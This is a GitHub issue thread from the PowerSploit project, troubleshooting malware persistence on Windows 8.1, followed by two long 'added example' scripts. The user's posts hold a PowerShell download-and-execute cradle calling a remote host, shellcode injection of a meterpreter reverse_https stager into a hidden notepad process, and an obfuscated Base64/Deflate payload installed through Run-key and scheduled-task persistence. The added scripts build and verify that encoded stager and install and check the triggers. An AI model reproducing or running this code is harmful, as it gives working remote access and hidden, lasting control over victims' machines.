PowerShellMafia / PowerSploit

PowerSploit - A PowerShell Post-Exploitation Framework

Issue with Persistence on Windows 8.1 x64 #81

Closed GarrettVD closed 8 years ago

GarrettVD commented 9 years ago

Having some difficulty getting persistence to work properly. My payload doesn't appear to be executing at the specified times (Logon / Daily).

The scenario is this: I have a .bat file which executes the following:

@ECHO ON
REM Download the combined module + payload and run it in memory (closing quote was missing in the original paste)
%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe -Exec ByPass -Nol -Command "IEX (New-Object Net.WebClient).DownloadString('http://12.34.56.78/payload')"

http://12.34.56.78/payload is simply two modules combined into one file (Persistence.psm1 + Invoke-Shellcode.ps1) with my actual payload tacked onto the very end, which simply starts a notepad.exe process and invokes a windows/meterpreter/reverse_https on that instance:

# ...Contents of Persistence.psm1 + Invoke-Shellcode here...
# Spawn a hidden 32-bit notepad.exe and keep the process object so we have its PID
$app = Start-Process C:\Windows\SysWOW64\notepad.exe -WindowStyle Hidden -PassThru
# Inject the reverse_https stager into that process; -Force skips the confirmation prompt
Invoke-Shellcode -ProcessId $app.Id -Payload windows/meterpreter/reverse_https -Lhost 12.34.56.78 -Lport 8443 -Force -Verbose

The above works perfectly when there is no persistence involved -- I execute the .bat file on my target Windows 8.1 x64 machine, and my metasploit multi/handler on 12.34.56.78 springs to life and a Meterpreter session opens.

But no such luck with persistence, and I have a feeling that I'm not quite getting this right...

What I'm doing is base-64 encoding my payload ("IEX (New-Object Net.WebClient).DownloadString('http://12.34.56.78/payload')") and plopping it onto the following PowerShell script, which generates the Persistence.ps1 and RemovePersistence.ps1 files, which subsequently appear to do nothing / fail to spawn a meterpreter instance when executed on my Windows 8.1 machine, immediately or upon user logon. :(

# Script block that decodes a Base64 blob, inflates it with DeflateStream and runs the result
# (stray closing quote at the end of this line removed; it was a syntax error in the original paste)
$p = {iex $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyAC4AMwA0AC4ANQA2AC4ANwA4AC8AcABhAHkAbABvAGEAZAAnACkA")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd()}
# Load the Persistence and Invoke-Shellcode modules into memory on the attacker box
IEX (New-Object Net.WebClient).DownloadString('http://12.34.56.78/modules')
$u = New-UserPersistenceOptions -Registry -AtLogon
$e = New-ElevatedPersistenceOptions -ScheduledTask -Daily -At '10:00 AM'
# Generate Persistence.ps1 / RemovePersistence.ps1 and also return the persistence script
Add-Persistence -ScriptBlock $p -UserPersistenceOptions $u -ElevatedPersistenceOptions $e -Verbose -PassThru

Note that http://12.34.56.78/modules is the Persistence.psm1 + Invoke-Shellcode modules, without the meterpreter payload snippet. My train of thought there is that, because I don't have PowerSploit installed on my target machine, they need to be loaded into memory? Maybe that's where the problem is.

Any ideas?
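The `$p` wrapper in the post above decodes its Base64 blob through a raw `DeflateStream` and reads the result as ASCII, so whatever goes inside `FromBase64String` has to be produced by the matching compress-then-Base64 chain. The following is an added example, not code from the issue or from PowerSploit: it builds a blob in that exact layout from the stage-one downloader string, decodes it the same way the wrapper does to prove the round trip, and then assembles the script block for `Add-Persistence`. The host and URL are the ones from the post; `ConvertTo-DeflateBase64` and `ConvertFrom-DeflateBase64` are names chosen here.

```powershell
# Added example (not from the issue or from PowerSploit): produce a deflate+Base64
# blob in the layout the $p wrapper decodes (raw DeflateStream, ASCII text) and
# verify it round-trips before handing it to Add-Persistence.
function ConvertTo-DeflateBase64 {
    param([string]$Text)
    $ms = New-Object IO.MemoryStream
    $ds = New-Object IO.Compression.DeflateStream($ms, [IO.Compression.CompressionMode]::Compress)
    $sw = New-Object IO.StreamWriter($ds, [Text.Encoding]::ASCII)
    $sw.Write($Text)
    $sw.Close()   # flushes the deflate block and closes the underlying streams
    # MemoryStream.ToArray() is still valid after the stream is closed
    [Convert]::ToBase64String($ms.ToArray())
}

function ConvertFrom-DeflateBase64 {
    param([string]$Blob)
    # Same decode chain as the $p wrapper in the post: Base64 -> MemoryStream -> Deflate -> ASCII
    $ms = New-Object IO.MemoryStream (,[Convert]::FromBase64String($Blob))
    $ds = New-Object IO.Compression.DeflateStream($ms, [IO.Compression.CompressionMode]::Decompress)
    (New-Object IO.StreamReader($ds, [Text.Encoding]::ASCII)).ReadToEnd()
}

# Constructed stage-one command (same host and path as the post)
$stager  = "IEX (New-Object Net.WebClient).DownloadString('http://12.34.56.78/payload')"
$blob    = ConvertTo-DeflateBase64 -Text $stager
$decoded = ConvertFrom-DeflateBase64 -Blob $blob
if ($decoded -ne $stager) { throw 'Round trip failed: blob does not decode to the stager' }

# Build the same wrapper the post uses, with the verified blob substituted in.
# Single quotes keep $( ... ) literal; -f only replaces {0}, and Base64 contains no braces.
$template = 'iex $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("{0}")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd()'
$p = [ScriptBlock]::Create(($template -f $blob))

# Sanity check: invoking the wrapper's inner decode (everything after "iex ") must yield the stager
$inner = [ScriptBlock]::Create($p.ToString().Substring(4))
if ((& $inner) -ne $stager) { throw 'Wrapper does not decode to the stager' }
$p.ToString()
```

Running this in a local PowerShell session (no target needed) confirms the blob is in the form the wrapper expects before any persistence mechanism is installed; a blob that is Base64 of plain text rather than of deflate output will make the second check throw, which is a quicker diagnosis than waiting for a logon trigger that silently does nothing.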

PowerShellMafia commented 8 years ago

I fixed a couple bugs that I found in Add-Persistence, FYI.

The following simple payload should work. Give it a try and let me know.

# Benign payload: append a timestamp to %TEMP%\date.txt each time the trigger fires
$Payload = { Get-Date | Out-File -FilePath "$($Env:TEMP)\date.txt" -Append }
# Elevated trigger: daily scheduled task at 10:00 AM (requires an elevated session to install)
$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -Daily -At '10:00 AM'
# Unprivileged trigger: HKCU Run key, fires at user logon
$UserOptions = New-UserPersistenceOption -Registry -AtLogon
# -PassThru returns the generated persistence script instead of only writing Persistence.ps1
$PersistencePayload = Add-Persistence -ScriptBlock $Payload -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -PassThru
# Execute the generated script on the current host to install the triggers
Invoke-Expression $PersistencePayload
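When a persistence payload "does nothing", the first thing to establish is whether the triggers were installed at all, separately from whether the payload runs. The script below is an added example, not part of the issue thread or of PowerSploit: it installs the benign test payload from the reply above and then enumerates the two places `Add-Persistence` was asked to write to (HKCU Run values and scheduled tasks) looking for entries that launch powershell.exe. It assumes a local copy of the module at `C:\Tools\PowerSploit\Persistence\Persistence.psm1` (assumed path), and `Get-PersistenceArtifacts` is a name chosen here. Run it from an elevated PowerShell so the scheduled task can be created.

```powershell
# Added example (not from the issue or from PowerSploit): install the benign test
# payload and then verify the artifacts Add-Persistence should have left behind.
Import-Module 'C:\Tools\PowerSploit\Persistence\Persistence.psm1'   # assumed local path

$Payload = { Get-Date | Out-File -FilePath "$($Env:TEMP)\date.txt" -Append }
$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -Daily -At '10:00 AM'
$UserOptions     = New-UserPersistenceOption -Registry -AtLogon
$PersistencePayload = Add-Persistence -ScriptBlock $Payload -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -PassThru
Invoke-Expression $PersistencePayload

function Get-PersistenceArtifacts {
    # User-level trigger: HKCU Run values whose command launches powershell.exe.
    # Skip the PS* metadata properties Get-ItemProperty adds (PSPath contains "PowerShell").
    $run = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
    $runHits = (Get-ItemProperty -Path $run).PSObject.Properties |
        Where-Object { $_.Name -notlike 'PS*' -and $_.Value -is [string] -and $_.Value -match 'powershell' } |
        ForEach-Object { [pscustomobject]@{ Kind = 'RunKey'; Name = $_.Name; Command = $_.Value } }

    # Elevated trigger: scheduled tasks whose action runs powershell.exe.
    # schtasks /fo CSV /v works on Windows 7+, so it does not depend on the ScheduledTasks module.
    $taskHits = schtasks.exe /query /fo CSV /v | ConvertFrom-Csv |
        Where-Object { $_.'Task To Run' -match 'powershell' } |
        ForEach-Object { [pscustomobject]@{ Kind = 'Task'; Name = $_.TaskName; Command = $_.'Task To Run' } }

    @($runHits) + @($taskHits)
}

$artifacts = Get-PersistenceArtifacts
$artifacts | Format-Table -AutoSize -Wrap
if (-not $artifacts) {
    Write-Warning 'No Run-key or scheduled-task entry launching powershell.exe found; the triggers were not installed.'
}

# The payload only fires on its trigger (next logon / 10:00 AM), so this file appears after that,
# not at install time. Its absence with triggers present points at the payload, not the install.
$marker = "$($Env:TEMP)\date.txt"
if (Test-Path $marker) { "Payload has fired; last entry: $((Get-Content $marker)[-1])" }
else { "Payload has not fired yet; waiting on trigger. Marker path: $marker" }
```

Separating the two checks is the point: an entry in the Run key or task list with no marker file means the trigger is in place and the decoding or download step inside the payload is what needs debugging; no entries at all means `Add-Persistence` itself never ran to completion (for example because the module was not loaded in the session that executed it), and the payload is not yet the problem.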